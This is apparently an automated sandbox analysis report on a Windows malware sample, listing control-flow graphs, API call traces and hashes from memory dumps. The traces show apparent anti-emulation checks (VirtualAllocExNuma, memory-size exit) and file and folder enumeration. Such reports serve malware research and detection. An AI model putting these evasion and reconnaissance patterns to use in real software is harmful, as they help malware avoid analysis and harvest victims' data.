                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                          • ExitProcess.KERNEL32 ref: 003A1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003A106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003A10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: aeaa18f97cd3d15d697be6d8fdc1bc2c437d214228752df620ccc1f3e4260974
                          • Instruction ID: 75e7532d4528c34f23b10dbf51f702d85b04a851f96fe2f82d3b15effcecd59b
                          • Opcode Fuzzy Hash: aeaa18f97cd3d15d697be6d8fdc1bc2c437d214228752df620ccc1f3e4260974
                          • Instruction Fuzzy Hash: 3C014471342204BBE7205B646C0EF6B77ACE7A1B01F208016F708E32C0D9B1E9049624

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2805 3bee90-3beeb5 call 3a2930 2808 3beec9-3beecd call 3a6c40 2805->2808 2809 3beeb7-3beebf 2805->2809 2812 3beed2-3beee8 StrCmpCA 2808->2812 2809->2808 2810 3beec1-3beec3 lstrcpy 2809->2810 2810->2808 2813 3beeea-3bef02 call 3a2a20 call 3a2930 2812->2813 2814 3bef11-3bef18 call 3a2a20 2812->2814 2823 3bef45-3befa0 call 3a2a20 * 10 2813->2823 2824 3bef04-3bef0c 2813->2824 2820 3bef20-3bef28 2814->2820 2820->2820 2822 3bef2a-3bef37 call 3a2930 2820->2822 2822->2823 2831 3bef39 2822->2831 2824->2823 2827 3bef0e-3bef0f 2824->2827 2830 3bef3e-3bef3f lstrcpy 2827->2830 2830->2823 2831->2830
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 003BEEC3
                          • StrCmpCA.SHLWAPI(?,ERROR), ref: 003BEEDE
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 003BEF3F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy
                          • String ID: ERROR
                          • API String ID: 3722407311-2861137601
                          • Opcode ID: 159f9f67682226d302f209631994da2c62ed0f157548ffaa18c72e97a2466565
                          • Instruction ID: 1ffbd69d07988d43e3626355eb7083460e4fe7a7614bd7c6ecb0142aff4e7674
                          • Opcode Fuzzy Hash: 159f9f67682226d302f209631994da2c62ed0f157548ffaa18c72e97a2466565
                          • Instruction Fuzzy Hash: D921FF317202059BCB27BF7CD846AEB37A4EF11304F055429B84ADFA52EE30D8248B90

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2886 3a10c0-3a10cb 2887 3a10d0-3a10dc 2886->2887 2889 3a10de-3a10f3 GlobalMemoryStatusEx 2887->2889 2890 3a1112-3a1114 ExitProcess 2889->2890 2891 3a10f5-3a1106 2889->2891 2892 3a111a-3a111d 2891->2892 2893 3a1108 2891->2893 2893->2890 2894 3a110a-3a1110 2893->2894 2894->2890 2894->2892
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 803317263-2766056989
                          • Opcode ID: a38697c4e75742e8507920762ea27784834032e6882cebb0d5ecb039f6688a8c
                          • Instruction ID: 22e6a2692b7d000e80e30ee54ca3c50757653c42af834cac03a40c4a996a690f
                          • Opcode Fuzzy Hash: a38697c4e75742e8507920762ea27784834032e6882cebb0d5ecb039f6688a8c
                          • Instruction Fuzzy Hash: 3AF0EC701182455BEB55BA64DC4A72EF7DCEB13350F144A2EDE9BC2191E774C8409167

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2895 3b8c88-3b8cc4 StrCmpCA 2897 3b8ccd-3b8ce6 2895->2897 2898 3b8cc6-3b8cc7 ExitProcess 2895->2898 2900 3b8cec-3b8cf1 2897->2900 2901 3b8ee2-3b8eef call 3a2a20 2897->2901 2903 3b8cf6-3b8cf9 2900->2903 2905 3b8cff 2903->2905 2906 3b8ec3-3b8edc 2903->2906 2907 3b8d5a-3b8d69 lstrlen 2905->2907 2908 3b8dbd-3b8dcb StrCmpCA 2905->2908 2909 3b8ddd-3b8deb StrCmpCA 2905->2909 2910 3b8dfd-3b8e0b StrCmpCA 2905->2910 2911 3b8e1d-3b8e2b StrCmpCA 2905->2911 2912 3b8e3d-3b8e4b StrCmpCA 2905->2912 2913 3b8d30-3b8d3f lstrlen 2905->2913 2914 3b8e56-3b8e64 StrCmpCA 2905->2914 2915 3b8e88-3b8e9a lstrlen 2905->2915 2916 3b8e6f-3b8e7d StrCmpCA 2905->2916 2917 3b8d06-3b8d15 lstrlen 2905->2917 2918 3b8d84-3b8d92 StrCmpCA 2905->2918 2919 3b8da4-3b8db8 StrCmpCA 2905->2919 2906->2901 2938 3b8cf3 2906->2938 2935 3b8d6b-3b8d70 call 3a2a20 2907->2935 2936 3b8d73-3b8d7f call 3a2930 2907->2936 2908->2906 2922 3b8dd1-3b8dd8 2908->2922 2909->2906 2923 3b8df1-3b8df8 2909->2923 2910->2906 2924 3b8e11-3b8e18 2910->2924 2911->2906 2925 3b8e31-3b8e38 2911->2925 2912->2906 2926 3b8e4d-3b8e54 2912->2926 2933 3b8d49-3b8d55 call 3a2930 2913->2933 2934 3b8d41-3b8d46 call 3a2a20 2913->2934 2914->2906 2929 3b8e66-3b8e6d 2914->2929 2931 3b8e9c-3b8ea1 call 3a2a20 2915->2931 2932 3b8ea4-3b8eb0 call 3a2930 2915->2932 2916->2906 2930 3b8e7f-3b8e86 2916->2930 2927 3b8d1f-3b8d2b call 3a2930 2917->2927 2928 3b8d17-3b8d1c call 3a2a20 2917->2928 2918->2906 2921 3b8d98-3b8d9f 2918->2921 2919->2906 2921->2906 2922->2906 2923->2906 2924->2906 2925->2906 2926->2906 2954 3b8eb3-3b8eb5 2927->2954 2928->2927 2929->2906 2930->2906 2931->2932 2932->2954 2933->2954 2934->2933 2935->2936 2936->2954 2938->2903 2954->2906 2955 3b8eb7-3b8eb9 2954->2955 2955->2906 2956 3b8ebb-3b8ebd lstrcpy 2955->2956 2956->2906
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: d89f91dc8ac8c1d093697df88394052c0a7043b18675a7caf98ea5cab9d026df
                          • Instruction ID: 7f361b62052df3ca78f535d65e46726e2051fda53bb63b8a7daba2ce32a99c51
                          • Opcode Fuzzy Hash: d89f91dc8ac8c1d093697df88394052c0a7043b18675a7caf98ea5cab9d026df
                          • Instruction Fuzzy Hash: DCE09225005255FBCB219BB9DC98A82BBA9EFAA300B451896E600AF654D630FC05D7A6

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 2957 3c2ad0-3c2b22 GetProcessHeap RtlAllocateHeap GetComputerNameA 2958 3c2b44-3c2b59 2957->2958 2959 3c2b24-3c2b36 2957->2959
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003C2AFF
                          • RtlAllocateHeap.NTDLL(00000000), ref: 003C2B06
                          • GetComputerNameA.KERNEL32(00000000,00000104), ref: 003C2B1A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: 3ab40d9b5235234d0b383adae8b8741dde4decd01eb1c562eb678bb4ee9ca945
                          • Instruction ID: 5aed19e3d62134ec01687e994c14f07567360d45f329722962b5aee6c1ce4cb6
                          • Opcode Fuzzy Hash: 3ab40d9b5235234d0b383adae8b8741dde4decd01eb1c562eb678bb4ee9ca945
                          • Instruction Fuzzy Hash: 0601D176A45648ABC720DF99EC49BAEF7B8F744B21F00026BF919E3780D774190487A1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 003A1046
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 003A104D
                          • ExitProcess.KERNEL32 ref: 003A1058
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 003A106C
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000), ref: 003A10AB
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocProcess$CurrentExitFreeNuma
                          • String ID:
                          • API String ID: 3477276466-0
                          • Opcode ID: 06ee86f402543fa21776d88ffaa73c3e3b2519b2853ef9dc13fe492cb7181786
                          • Instruction ID: 1384ef6bf3905019f7545177769b101f67761379c323ba8780f6c65cb7384d98
                          • Opcode Fuzzy Hash: 06ee86f402543fa21776d88ffaa73c3e3b2519b2853ef9dc13fe492cb7181786
                          • Instruction Fuzzy Hash: 5EE0C2B468A3443EF73113616C0FF023F2CAB22B01F018003F344E60C2D5D4A405A668
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003B23D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B23F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003B2402
                          • lstrlen.KERNEL32(\*.*), ref: 003B240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003B2436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003B246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003B2486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000005D8000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519383380.00000000005EA000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.00000000005EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000774000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000853000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.000000000087B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000884000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519403459.0000000000893000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519661980.0000000000894000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519785257.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_3a0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 211596184a3695c0e4d60a1f5164bcced18aef1afd0e57ae66d61a9f9bb02519
                          • Instruction ID: ed47fc4494c4843be7fd12f786aa250e34fded00c91dc2dcdbb5f5ffd1ced2db
                          • Opcode Fuzzy Hash: 211596184a3695c0e4d60a1f5164bcced18aef1afd0e57ae66d61a9f9bb02519
                          • Instruction Fuzzy Hash: E1A29D31A11216ABCB33AFA8DC89AEF77B9EF15704F05412AF909DB611DB34DD058B90
                          APIs
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A16E2
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A176C
                          • lstrcat.KERNEL32(00000000), ref: 003A1776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A17EF
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A17F9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1825
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1875
                          • lstrcat.KERNEL32(00000000), ref: 003A187F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A18AB
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A18F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A18FE
                          • lstrlen.KERNEL32(003D1794), ref: 003A1909
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1929
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1935
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A195B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1966
                          • lstrlen.KERNEL32(\*.*), ref: 003A1971
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A198E
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 003A199A
                            • Part of subcall function 003C4040: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,00000000), ref: 003C406D
                            • Part of subcall function 003C4040: lstrcpy.KERNEL32(00000000,?), ref: 003C40A2
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A19C3
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1A0E
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A16
                          • lstrlen.KERNEL32(003D1794), ref: 003A1A21
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A41
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1A4D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1A76
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1A81
                          • lstrlen.KERNEL32(003D1794), ref: 003A1A8C
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1AAC
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1AB8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1ADE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1AE9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1B11
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 003A1B45
                          • StrCmpCA.SHLWAPI(?,003D17A0), ref: 003A1B70
                          • StrCmpCA.SHLWAPI(?,003D17A4), ref: 003A1B8A
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1BC4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1BFB
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C03
                          • lstrlen.KERNEL32(003D1794), ref: 003A1C0E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C31
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1C3D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1C69
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1C74
                          • lstrlen.KERNEL32(003D1794), ref: 003A1C7F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CA2
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1CAE
                          • lstrlen.KERNEL32(?), ref: 003A1CBB
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1CDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1CE9
                          • lstrlen.KERNEL32(003D1794), ref: 003A1CF4
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1D14
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1D20
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D46
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1D51
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1D7D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1DE0
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1DEB
                          • lstrlen.KERNEL32(003D1794), ref: 003A1DF6
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E19
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1E25
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1E4B
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A1E56
                          • lstrlen.KERNEL32(003D1794), ref: 003A1E61
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1E81
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A1E8D
                          • lstrlen.KERNEL32(?), ref: 003A1E9A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EBA
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1EC8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1EF4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A1F3E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 003A1F45
                          • lstrcpy.KERNEL32(00000000,003CCFEC), ref: 003A1F9F
                          • lstrlen.KERNEL32(00F290B8), ref: 003A1FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A1FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 003A1FE3
                          • lstrlen.KERNEL32(003D1794), ref: 003A1FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A200E
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 003A2042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 003A204D
                          • lstrlen.KERNEL32(003D1794), ref: 003A2058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 003A2075
                          • lstrcat.KERNEL32(00000000,003D1794), ref: 003A2081
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1519126327.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true
                          • Associated: 00000000.00000002.1519096317.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.00000000003D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000042E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.0000000000436000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1519126327.000000000044F000.00000040.00000001.01000000.00000003.sdmpDownload File
